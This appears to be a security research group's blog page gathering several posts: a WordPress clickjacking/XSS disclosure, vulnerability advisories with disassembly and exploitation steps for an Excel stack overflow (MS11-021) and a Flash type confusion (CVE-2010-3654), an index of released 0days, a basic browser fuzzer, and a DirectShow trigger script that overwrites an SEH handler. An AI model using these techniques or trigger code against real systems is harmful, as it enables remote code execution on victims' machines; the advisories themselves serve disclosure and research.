Exploiting Admin Functionality in WordPress Using ClickJacking

hello all

it’s been a while after writing a post and you may know Abysssec  mostly write about application security but we are working on web apps too . in this post we are gonna talk about funny case of wordpress exploitation using ClickJacking technology. as you may know Wordpress Admin panel has x-frame-option which prevent clickjacking but in main page of blog no x-frame-option has been set, so it possible to trick him and make him to post a comment, using Clickjacking. As you may know admin can post comment with html and it is obvious by default this isn’t dangerous, But as blog main page has no x-frame-option it is possible to make XSS of it and finally you can mix ClickJacking /XSS / HTTPOnly Disclosure to make a working exploit.

here is video of  PoC sorry for hosting we have some issue we will upload on abysssec soon  :

http://abysssec.com/files/WordPress_ClickJack.rar

WordPress is aware of unfiltered html with superadmin user but as you can see it’s still possible to exploit the issue .

we reported this so called issue to wordpress ~2 month ago

the answer we got is :

5/4/2012:
Thank you for the report. We're looking into this and will get back to you soon.
5/16/2012:
Sorry for the delayed reply. We've been discussing how best to do this without inconveniencing users.  At the moment we're considering adding the unfiltered_html nonce via JS when the page is not framed. I'll hopefully have a patch to share soon.

Thanks all

happy blogging !

Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability BA / Exploit (MS11-021)

hello all

as we didn’t publish any exploit for a bit we just going to release.

1) Advisory information

Title : Microsoft Excel 2007 SP2 Buffer Overwrite Vulnerability

Vendor : http://www.microsoft.com
Impact : Critical
Contact : info [at] abysssec.com
Twitter : @abysssec

Microsoft :
A remote code execution vulnerability exists in the way that Microsoft Excel handles specially crafted Excel files.An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

2) Vulnerability detail

each excel file can contain multiple BOF (2057) records . This record specifies the first substream associated with workbook.One of the fields in these records, specify substream recordd to come with. This field can be extracted from sub_3018F0C2 function.

.text:301A0C87 push [ebp+arg_2C]
.text:301A0C8A mov ecx, [ebp+var_14]
.text:301A0C8D push 1
.text:301A0C8F call sub_3018F0C2
.text:301A0C94 mov ecx, eax
.text:301A0C96 mov eax, [ebp+arg_24]
.text:301A0C99 cmp eax, ebx
.text:301A0C9B mov [ebp+var_10], ecx
.text:301A0C9E jz short loc_301A0CA2
.text:301A0CA0 mov [eax], ecx

If the field value is equal with 400, sub_3019DFBA function is called to check file type. if file type is xls EXCEL.exe will display a message If approved it will continue to run the code.if you change file extension to xlb there will be any message. After this step sub_3053F626 function will be executed. This function will parse the next BOF records.


.text:304D4E9D cmp [ebp+arg_20], ebx
.text:304D4EA0 jnz short loc_304D4EC6
.text:304D4EA2 test dword ptr word_30EDCF9C, 2000000h
.text:304D4EAC jnz short loc_304D4EC6
.text:304D4EAE mov edx, [ebp+arg_C]
.text:304D4EB1 mov ecx, [ebp+arg_8]
.text:304D4EB4 push 3Fh
.text:304D4EB6 call sub_3019DFBA
.text:304D4EBB cmp eax, ebx
.text:304D4EBD mov [ebp+var_8], eax
.text:304D4EC0 jz loc_304D4FD3
.text:304D4EC6
.text:304D4EC6 loc_304D4EC6: ; CODE XREF: sub_301A0BC7+3342D9j
.text:304D4EC6 ; sub_301A0BC7+3342E5j
.text:304D4EC6 push ebx
.text:304D4EC7 push dword_30EB89A4
.text:304D4ECD push [ebp+var_C]
.text:304D4ED0 call sub_3053F626
.text:304D4ED5 cmp dword_30F5E64C, ebx
.text:304D4EDB mov [ebp+var_8], eax
.text:304D4EDE jz short loc_304D4EE7
.text:304D4EE0 cmp eax, ebx
.text:304D4EE2 jz short loc_304D4EE7

one of records may come after BOF,is undocumented record which have record type equal to 0xA7 (167). for truly parsing this record should come with another record with 0x3C (60) record type. if it meet this requirement the length of records will be read and copied to the stack the function which operation of copying data records in the stack is sub_30199E55. This function takes three arguments .The first argument specifies the number of bytes to copy, which will read from file. The second argument specifies the destination of the copy and the third argument specifies the maximum amount of data can be copied. values of the second and third arguments based on the amount of computing reading from file and into this cumpoting,computational error which may occur here …


.text:3053F830 call sub_301A0A01
.text:3053F835 cmp eax, 3Ch
.text:3053F838 mov [ebp+var_ED4], eax
.text:3053F83E jnz loc_30540488
.text:3053F844 call sub_301A0A01
.text:3053F849 mov ecx, [ebp+var_EDC]
.text:3053F84F imul ecx, [ebp+var_F00]
.text:3053F856 mov edi, eax
.text:3053F858 mov eax, [ebp+var_EE0]
.text:3053F85E lea ebx, [ecx+eax+3]
.text:3053F862 call sub_301A0ABE
.text:3053F867 push 0FFFFFFFDh
.text:3053F869 pop edx
.text:3053F86A sub edx, ecx
.text:3053F86C add eax, edx
.text:3053F86E push eax ; Dst
.text:3053F86F push ebx ; int
.text:3053F870 mov eax, edi
.text:3053F872 call sub_30199E55

the vulnerability that exists here is that we can change the value of parameter 3 whith our own values. program will not correcly controll third argument of sub_30199E55 this and can result in the desired amount and location of desired data can overwrite in the stack.


.text:30199E60 cmp edi, [esp+4+Dst]
.text:30199E64 ja loc_303EE1B7
.text:30199E6A mov ecx, [esp+4+arg_0]
.text:30199E6E push ebx
.text:30199E6F mov ebx, dword_30F726C0
.text:30199E75 push ebp
.text:30199E76 mov ebp, nNumberOfBytesToRead
.text:30199E7C push esi
.text:30199E7D mov [esp+10h+Dst], ecx
....
.text:30199E93 mov eax, [esp+10h+Dst]
.text:30199E97 push esi ; Size
.text:30199E98 lea edx, dword_30F6E6B8[ebx]
.text:30199E9E push edx ; Src
.text:30199E9F push eax ; Dst
.text:30199EA0 sub edi, esi
.text:30199EA2 call memcpy
.text:30199EA7 add [esp+1Ch+Dst], esi
.text:30199EAB add ebx, esi
.text:30199EAD add esp, 0Ch
.text:30199EB0 test edi, edi
.text:30199EB2 mov dword_30F726C0, ebx
.text:30199EB8 jnz loc_301E0DB3

3) Exploitation :

Stack overflows are not hard to exploit at all ! but as we have both /GS , SAFESEH here. because given that we are destined to memcpy we can change it so that it begins to overwrite the stack after GS. and from there when the return comes , our values contained in the ESP and we can call it with simple call esp and game is over !!!

 

download full exploit source  : MS11-021

Happy Hacking .

 

 

 

 

 

 

 

Exploiting Adobe Flash Player on Windows 7

Hello again . as a lot of readers like windows 7 exploits here is other one .

1) Advisory information

Title                   : Adobe Flash player Action script type confusion  

Version             :  flash10h.dll

Discovery         :  Malware writers

Exploit              :  abysssec.com

Vendor             :  http://www.adobe.com

Impact              :  Critical

Contact            :   info  [at] abysssec.com

Twitter            : @abysssec

CVE                    : CVE-2010-3654

2) Vulnerable version

Adobe Flash Player 10.1.53 .64 prior versions

3) Vulnerability information

 

Class 

1- Type Confusion

Impact

Successfully exploiting this issue allows remote attackers to execute code under the context of targeted browser.

Remotely Exploitable

Yes

Locally Exploitable

Yes

4) Vulnerability detail

Here we have type confusion vulnerability in ActionScript bytecode language. The cause of these vulnerabilities is because of implementation of verification process in AS3 jit engine that because of some miscalculation in verifying datatype atoms, some data replaces another type of data and the confusion results in faulty machine code.

Action script has the following structure. First our scripts are compiled using an action script compiler like flex to AS3 ByteCodes and embed it to DoABC, DoAction or DoInitAction tags in swf file format. When flash player opens the swf file, bytecodes are compiled to a jitted machine code through verification and generation process. Verification process is responsible for checking bytecodes to be valid instructions and it pass the valid bytecodes to generation process, thus generation process produces the machine code in memory.

According to Dion Blazakis’s JIT Spray paper:

 

To handle this runtime typing requirement, the ActionScript interpreter represents internal objects using tagged pointers – internal, this object is called an “atom”. Tagged pointers are a common implementation technique to differentiate between those objects stored by value and those stored by reference using the same word sized memory cell. A tagged pointer stores type information in the least significant bits and stores a type specific values in the most significant bits. As shown in Illustration 1, the ActionScript atom is 32 bits wide; it allocates 3 bits to store the type information and uses 29 bits for the value.

So if it would be possible to confuse verifier too act an atom as another atom by some bytecode changes it would be possible to generate faulty code that most of the times lead to disclosing a vtable pointer call to the attacker.

The bug is perfectly presented in Haifei li recent slides. We have OriginalClass and RefClass with the same functions. Func1 – OriginalClass return a class objects, but Func1 – RefClass returns another type. By changing a byte in the bytecode we have confused AS3 to execute RefClass functions in the main class. After that verifier confuses the return type of the function with an OriginalClass object and generate faulty code with the vtable under the control of the return value.

 

Exploitation:

For exploitation purpose on recent protections on windows 7 without any 3rd party, it is possible to use the same bug many times to leak the imageBase address and payload address. In our exploit we used three confusion to read String Objects address and accordingly imagebase address.

Step1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase.

Step2: leak address of the shellcode with the same pointer and NewNumber trick.

Step3: send imageBase & shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string.

Step4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. And thus address of our rop payload will be used as vtable in the fake class object.

Note: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable.

5) Conclusion

Finally we got the point that memory leakages are extremely useful in modern exploitation to bypass DEP, ASLR protections. It would be possible to find same atom confusion situation and other object leakage in adobe flash player. Kudos to haifei li for his great research, although it was not that simple to implement a reliable exploit with just slides without attending in talk.

6) Refrences

http://www.cansecwest.com/csw11/Flash_ActionScript.ppt

http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf

7) Exploit-Code

Here you can get our reliable exploit against windows 7 :

calc.exe payload

Download : CVE-2010-3654_Win7

if you need other payloads for sure you know how to change it ;)

as always feedbacks are welcomed and you can follow @abysssec in twitter to getting updates .

Happy Hunting !

MOAUB – Day by Day

Yes ! finally MOAUB (Month of Abysssec Undisclosed Bugs) started and finished as well.

Month of all User Bugs

Good Or Bad we released lots of 0days and binary analyses during a month (September) and you can use these info for owning websites UN-patched clients  or writing more secure applications .

here is summary:

Day1:

Binary Analysis:

MOAUB #1 – Adobe Acrobat Reader and Flash Player “newclass” invalid pointer

MOAUB #1 – Adobe Acrobat Reader and Flash Player “newclass” invalid pointer – Binary Analysis

0day:

MOAUB #1 – Cpanel PHP Restriction Bypass Vulnerability 0day

MOAUB #1 – Cpanel PHP Restriction Bypass Vulnerability 0day

———————————————————————————–

Day2:

Binary Analysis:

MOAUB #2 – Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability

MOAUB #2 – Apple QuickTime FlashPix NumberOfTiles Vulnerability – Binary Analysis

0day:

MOAUB #2 – Rainbowportal Multiple Remote Vulnerabilities

MOAUB #2 – Rainbowportal Multiple Remote Vulnerabilities – 0day

———————————————————————————–

Day3:

Binary Analysis:

MOAUB #3 – Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution

MOAUB #3 – Trend Micro Internet Security Pro 2010 ActiveX extSetOwner – Binary Analysis

0day:

MOAUB #3 – Visinia 1.3 Multiple Vulnerabilities

MOAUB #3 – Visinia CMS Multiple Vulnerabilities – 0day

———————————————————————————–

Day4:

Binary Analysis:

MOAUB #4 – Movie Maker Remote Code Execution (MS10-016)

MOAUB #4 – Movie Maker Remote Code Execution (MS10-016) – Binary Analysis

0day:

MOAUB #4 – syndeocms 2.8.02 Multiple Vulnerabilities

MOAUB #4 – Syndeocms 2.8.02 Multiple Vulnerabilities – 0day

———————————————————————————–

Day5:

Binary Analysis:

MOAUB #5 – Microsoft MPEG Layer-3 Remote Command Execution Exploit

MOAUB #5 – Microsoft MPEG Layer-3 Remote Command Execution – Binary Analysis

0day:

MOAUB #5 – IfNuke Multiple Remote Vulnerabilities 0day

MOAUB #5 – IfNuke Multiple Remote Vulnerabilities 0day

———————————————————————————–

Day6:

Binary Analysis:

MOAUB #6 – HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution

MOAUB #6 – HP OpenView NNM webappmon execvp_nc Remote Code Execution – Binary Analysis

0day:

MOAUB #6 – InterPhoto Gallery Multiple Remote Vulnerabilities

MOAUB #6 – InterPhoto Gallery Multiple Remote Vulnerabilities – 0day

———————————————————————————–

Day7:

Binary Analysis:

MOAUB #7 – Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow

MOAUB #7 – Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow

0day:

MOAUB #7 – DynPage <= v1.0 Multiple Remote Vulnerabilities – 0day

MOAUB #7 – DynPage <= v1.0 Multiple Remote Vulnerabilities – 0day

———————————————————————————–

Day8:

Binary Analysis:

MOAUB #8 – Microsoft Office Visio DXF File Stack based Overflow

MOAUB #8 – Microsoft Office Visio DXF File Stack based Overflow – Binary Analysis

0day:

MOAUB #8 – Sirang Web-Based D-Control Multiple Remote Vulnerabilities

MOAUB #8 – Sirang Web-Based D-Control Multiple Remote Vulnerabilities – 0 day

———————————————————————————–

Day9:

Binary Analysis:

MOAUB #9 – Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

MOAUB #9 – Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

0day:

FestOS CMS 2.3b Multiple Remote Vulnerabilities

MOAUB #9 – FestOS CMS 2.3b Multiple Remote Vulnerabilities

———————————————————————————–

Day10:

Binary Analysis:

MOAUB #10 – Excel RTD Memory Corruption

MOAUB #10 – Excel RTD Memory Corruption

0day:

MOAUB #10 – aradBlog Multiple Remote Vulnerabilities

MOAUB #10 – aradBlog Multiple Remote Vulnerabilities

———————————————————————————–

Day11:

Binary Analysis:

MOAUB #11 – Microsoft Office Word 2007 sprmCMajority Buffer Overflow

MOAUB #11 – Microsoft Office Word 2007 sprmCMajority Buffer Overflow

0day:

MOAUB #11 – ASP Nuke SQL Injection Vulnerability

MOAUB #11 – ASP Nuke Sql Injection Vulnerability

———————————————————————————–

Day12:

Binary Analysis:

MOAUB #12 – Adobe Acrobat and Reader “pushstring” Memory Corruption

MOAUB #12 – Adobe Acrobat and Reader “pushstring” Memory Corruption

0day:

MOAUB #12 – eshtery CMS SQL Injection Vulnerability

MOAUB #12 – eshtery CMS SQL Injection Vulnerability

———————————————————————————–

Day13:

Binary Analysis:

MOAUB #13 – RealPlayer FLV Parsing Integer Overflow

MOAUB #13 – RealPlayer FLV Parsing Integer Overflow

0day:

MOAUB #13 – Luftguitar CMS Vulnerability: Upload Arbitrary File

MOAUB #13 – Luftguitar CMS Vulnerability: Upload Arbitrary File

———————————————————————————–

Day14:

Binary Analysis:

MOAUB #14 – Novell iPrint Client Browser Plugin ExecuteRequest debug Parameter Stack Overflow

MOAUB #14 – Novell iPrint Client Browser Plugin ExecuteRequest debug Stack Overflow

0day:

MOAUB #14 – FreeDiscussionForums v1.0 Multiple Remote Vulnerabilities

MOAUB #14 – FreeDiscussionForums v1.0 Multiple Remote Vulnerabilities

———————————————————————————–

Day15:

Binary Analysis:

MOAUB #15 – Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption

MOAUB #15 – Ipswitch Imail Server List Mailer Reply-To Address Memory Corruption

0day:

MOAUB #15 – PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities

MOAUB #15 – PHP MicroCMS 1.0.1 Multiple Remote Vulnerabilities

———————————————————————————–

Day16:

Binary Analysis:

MOAUB #16 – Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability

MOAUB #16 – Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability

0day:

MOAUB #16 – mojoportal Multiple Remote Vulnerabilities

MOAUB #16 – mojoportal Multiple Remote Vulnerabilities

———————————————————————————–

Day17:

Binary Analysis:

MOAUB #17 – Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution

MOAUB #17 – Firefox Plugin Parameter EnsureCachedAttrParamArrays Remote Code Execution

0day:

MOAUB #17 – phpmyfamily Multiple Remote Vulnerabilities

MOAUB #17 – phpmyfamily Multiple Remote Vulnerabilities

———————————————————————————–

Day18:

Binary Analysis:

MOAUB #18 – Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability

MOAUB #18 – Apple QuickTime FLI LinePacket Remote Code Execution Vulnerability

0day:

MOAUB #18 – CMSimple XSRF Vulnerability

MOAUB #18- CMSimple XSRF Vulnerability

———————————————————————————–

Day19:

Binary Analysis:

MOAUB #19 – Novell iPrint Client Browser Plugin call-back-url Stack Overflow

MOAUB #19 – Novell iPrint Client Browser Plugin call-back-url Stack Overflow

0day:

MOAUB #19 – JMD-CMS Multiple Remote Vulnerabilities

MOAUB #19 – JMD-CMS Multiple Remote Vulnerabilities

———————————————————————————–

Day20:

Binary Analysis:

MOAUB #20 – Java CMM readMabCurveData Stack Overflow

MOAUB #20 – Java CMM readMabCurveData Stack Overflow

0day:

MOAUB #20 – VWD-CMS CSRF Vulnerability

MOAUB #20 – VWD-CMS CSRF Vulnerability

———————————————————————————–

Day21:

Binary Analysis:

MOAUB #21 – Microsoft Excel WOPT Record Parsing Heap Memory Corruption

MOAUB #21 – Microsoft Excel WOPT Record Parsing Heap Memory Corruption

0day:

MOAUB #21 – Personal.Net Portal Multiple Vulnerabilities

MOAUB #21 – Personal.Net Portal Multiple Vulnerabilities

———————————————————————————–

Day22:

Binary Analysis:

MOAUB #22 – Adobe Shockwave Director tSAC Chunk Memory Corruption

MOAUB #22 – Adobe Shockwave Director tSAC Chunk Memory Corruption

0day:

MOAUB #22 – gausCMS Multiple Vulnerabilities

MOAUB #22 – gausCMS Multiple Vulnerabilities

———————————————————————————–

Day23:

Binary Analysis:

MOAUB #23 – Adobe Acrobat Reader and Flash ‘newfunction’ Remote Code Execution Vulnerability

MOAUB #23 – Adobe Acrobat Reader and Flash ‘newfunction’ Remote Code Execution Vulnerability

0day:

MOAUB #23 – Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)

MOAUB #23 – Microsoft Excel HFPicture Record Parsing Memory Corruption (0day)

———————————————————————————–

Day24:

Binary Analysis:

MOAUB #24 – Microsoft Excel OBJ Record Stack Overflow

MOAUB #24 – Microsoft Excel OBJ Record Stack Overflow

0day:

MOAUB #24 – Microsoft MPEG Layer-3 Audio Decoder Division By Zero

MOAUB #24 – Microsoft MPEG Layer-3 Audio Decoder Division By Zero

———————————————————————————–

Day25:

Binary Analysis:

MOAUB #25 – Mozilla Firefox CSS font-face Remote Code Execution Vulnerability

MOAUB #25 – Mozilla Firefox CSS font-face Remote Code Execution Vulnerability

0day:

MOAUB #25 – VisualSite CMS v1.3 Multiple Vulnerabilities

MOAUB #25 – VisualSite CMS v1.3 Multiple Vulnerabilities

———————————————————————————–

Day26:

Binary Analysis:

MOAUB #26 – Microsoft Cinepak Codec CVDecompress Heap Overflow

MOAUB #26 – Microsoft Cinepak Codec CVDecompress Heap Overflow

0day:

MOAUB #26 – Zenphoto Config Update and Command Execute Vulnerability

MOAUB #26 – Zenphoto Config Update and Command Execute Vulnerability

———————————————————————————–

Day27:

Binary Analysis:

MOAUB #27 – Microsoft Internet Explorer MSHTML Findtext Processing Issue

MOAUB #27 – Microsoft Internet Explorer MSHTML Findtext Processing Issue

0day:

MOAUB #27 – ndCMS Sql Injection Vulnerability

MOAUB #27 – ndCMS Sql Injection Vulnerability

———————————————————————————–

Day28:

0day:

MOAUB #28 – JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability

MOAUB #28 – JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability

0day:

MOAUB #28 – AtomatiCMS Upload Arbitrary File Vulnerability

MOAUB #28 – AtomatiCMS Upload Arbitrary File Vulnerability

———————————————————————————–

Day29:

Binary Analysis:

MOAUB #29 – Microsoft Excel SxView Record Parsing Heap Memory Corruption

MOAUB #29 – Microsoft Excel SxView Record Parsing Heap Memory Corruption

Day30:

Binary Analysis:

MOAUB #30 – Microsoft Unicode Scripts Processor Remote Code Execution

MOAUB #30 – Microsoft Unicode Scripts Processor Remote Code Execution

0day:

MOAUB #30 – ASPMass Shopping Cart Vulnerability File Upload CSRF

MOAUB #30 – ASPMass Shopping Cart Vulnerability File Upload CSRF

———————————————————————————–

Press :

Exploit-Database
Dark-Reading
NetworkAsia
ITBusinessedge
ComputerWorld
Theinquirer
And …

———————————————————————————–

PS : during these project and maybe we made some technical and non-technical mistakes due to complexly and compaction of this work and we hope we can fix some of them.

at end we are happy with result and your kind feedback.

for sure we will have really more interesting projects soon as soon possible and we think you will like them as well .

please follow me on twitter with @abysssec for other news projects and stay tunned for more projects .

as always finally if you have any question feel free to contact :

shahin [at] abysssec.com

info [at] abysssec.com

Month of Abysssec Undisclosed bugs coming !

hello to all after a while we have big surprise for you .

We are about to unleash our Month Of Abysssec Undisclosed Bugs on exploit-db. Starting on the 1st of September, we will release a collection of 0days,  web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as MicrosoftMozillaSunAppleAdobe, HPNovel, etc. The 0day collection includes PoCs and Exploits for Microsoft ExcelInternet Explorer,Microsoft codecsCpanel and others.  The MOAUB will be hosted on the Exploit Database, and will be updated on a daily basis. Get your hard-hats on, your VM’s and debugging tools organized – it’s gonna be a an intensive ride!

this is link on exploit-db  :

http://www.exploit-db.com/moaub-0days-binary-analysis-exploit-pocs/

Follow Abysssec twitter to keep updated!

stay tunned .

writing a Browser fuzzer !!!

Hello all
in this post , i wanna talk about web browser Fuzzing  and auditing.
web browsers , such as FireFox , Opera , Internet Explorer  and etc .. , are very convertible with new web technologies.

For example :
when html5 comes , Firefox added html5 features to itself too.  and a clever Attacker could recognizing  this change and we will be able to find Security holes .

for more information please read :

w3.org publish paper with this title: HTML 5 differences from HTML 4
http://www.w3.org/TR/2009/WD-html5-diff-20090212/
and take HTML5 Overview :
http://dev.w3.org/html5/spec/Overview.html

please  pay attention to differences between FF3 & FF3.5 :

These changes include support for the <video> and <audio> tags as defined in the HTML 5 specification, with a goal to offer video playback without being encumbered by patent issues associated with many video technologies.

Cross-site XMLHttpRequests (XHR), which can allow for more powerful web applications and an easier way to implement mashups, are also implemented in 3.5.

A new global JSON object contains native functions to efficiently and safely serialize and deserialize JSON objects, as specified by the ECMAScript 3.1 draft.

Full CSS 3 selector support has been added. Firefox 3.5 uses the Gecko 1.9.1 engine, which includes a few features that were not included in the 3.0 release. Multi-touch support was also added to the release, including gesture support like pinching for zooming and swiping for back and forward.

and then milw0rm.com publish new exploit in “Firefox font tag !”
http://www.milw0rm.com/exploits/9137

we are not bloodsucker , we try to act like a  real hacker , Real hacker (Pen-tester i mean)  think about how to find  this type of bug .

since we know about all of  new  features in  new web browsers  such as of FF  and we can test features as a security researcher as well.

Browser Vulnerability Assessment  has tree  step :

1 – Find HTML or XML or javascript <tag> browser can support , for example :
http://msdn.microsoft.com/en-us/library/ms533050%28VS.85%29.aspx [IE]

2- find  Properties , Methods , Collections , Events ,Constants , Prototypes , HTML Elements for each <tag> .

3- misuse property of <tag> or fuzzed tag for buffer-overflow and other memory corruption vulnerabilities (in this case)

for example :
we want find memory corruption vulnerability using ,  unbound check in  <font> tag,  in  Internet explorer 8 !:
<font color=”#727272″>test</font>

take a look at  “MSDN” :
http://msdn.microsoft.com/en-us/library/ms535248%28VS.85%29.aspx

second : find “Attribute” and “property” of <font> tag , such as :
‘color’, ‘face’, ‘size’, ‘class’, ‘id’, ‘style’, ‘title’, ‘dir’, ‘lang’, ‘accesskey’, ‘tabindex’

third  : build random character for “overflows ” , “FormatString”  , and other memory corruptions …

for example to be more clear i wrote a really basic fuzzer in python :

(for sure this is not a commercial fuzzer)

# Abysssec Inc public material
# Simple Browser Fuzzer
# Abysssec.com
#garbage char
overflows = ['A' * 10, 'A' * 20, 'A' * 100, 'A' * 200]
fmtstring = ['%n%n%n%n%n', '%p%p%p%p%p', '%s%s%s%s%s', '%d%d%d%d%d', '%x%x%x%x%x']
numbers   = ['0', '-0', '1', '-1', '32767', '-32768', '2147483647', '-2147483647', '2147483648', '-2147483648']
 
# FONT property
fontpropery = ['color', 'face', 'size', 'class', 'id', 'style', 'title', 'dir', 'lang', 'accesskey', 'tabindex']
 
#basic Automated Fuzzer :
i = 0 
 
for x in fontpropery:
     for y in overflows:
    	tag = "<span>TEST</span>"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('')
	file.writelines(tag)
	file.close()
 
     for y in fmtstring:
    	tag =  "<span>TEST</span>"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('')
	file.writelines(tag)
	file.close()
 
     for y in numbers:
    	tag =  "<span>TEST</span>"
    	i = i + 1
	file = open( str(i) + ".html","w")
	file.writelines('')
	file.writelines(tag)
	file.close()

for start fuzzing , add refresh page with next page . [for start fuzz click 1.html]

another way :

“Jeremy Brown”  developed this a fuzzer for general browser fuzzing” :

  1. Written in PERL
  2. CSS/DOM/HTML/JS fuzzing comprehensive
  3. Specialized functions for fuzz page generation & writing
  4. Decent file structure easily supporting add/del/modification
  5. 3rd generation [unlimited style, web] fuzzing oracle implemented

http://www.krakowlabs.com/dev/fuz/bf2/bf2.pl.txt

this fuzzer is good but it’s really simple too and can’t find new vulnerabilities without modifying but   you can extend it for new method of browser <tag > fuzz .

more info :

http://www.krakowlabs.com/dev/fuz/bf2/bf2_doc.txt

Browser Auditing :

browser source code auditing  is actually white-box testing  and only is useful when you have  an open source browser like  Firefox  and …. .

source code auditing is really practical , but need higher then  knowledge in programming (always C/C++)
for example , in firefox :
you can download all versions  source code from here :
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases

more source code of FF written by C++ , my interested  C++ source code Auditor is : CPPcheck
http://sourceforge.net/apps/mediawiki/cppcheck

Important point that we understand from this Post :
why we can’t found bugs from this ways ?
i try to answer this question in future post .

————————————————————-

and this write-up is for  tell you we are “not dead”

wait for out new advisories + exploits soon as soon possible

god speed you

Daphne
———–
unfortunately , we had mistake in our simple fuzzer , now edit & repaired .
thanks .
Daphne /

Microsft Directshow and MPEG-2 Exploitation

hello we are really sorry for too late updates.

but we are busy but i have some good news and i will share with you soon . for  now i want to have short talk about new DirectShow vulnerabilities  one of this vulnerability is more fun and exploited in the wild in past days .and now exploit is  available in the wild.

anyway here is orginal advisory  (another good vulnerability from alex wheeler):

http://www.microsoft.com/technet/security/advisory/972890.mspx

this vulnerability can be exploit using  varient browser exploitation method like Heap Spray.

and flowing simple script can trigger vulnerabilty :

#!/usr/bin/python
import sys , os
 
gif =  "\x00\x03\x00\x00\x11\x20\x34\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
gif += "\xFF\xFF\xFF\xFF"    # End of SEH chain
gif += "\x41\x41\x41\x41"    # SE Handler
gif += "\x00"
 
fp = open("directshow.gif","wb")
fp.write(gif)
fp.close()
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='directshow.gif;
// Vulnerable ID
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

here you can see overwritten SEH

and here you can see Spared Heap

finally as you can see here we got a shell

using methods like java-script obfuscation and shirking variables can make this exploit more dangerous . and you can find this exploit at :

http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/browser/msvidctl_mpeg2.rb

and:

http://milw0rm.com/exploits/9108

Happy Hunting.

PS : i will try to have a technical post soon as soon possible

Cheers .

shahin

Categories


Get Adobe Flash player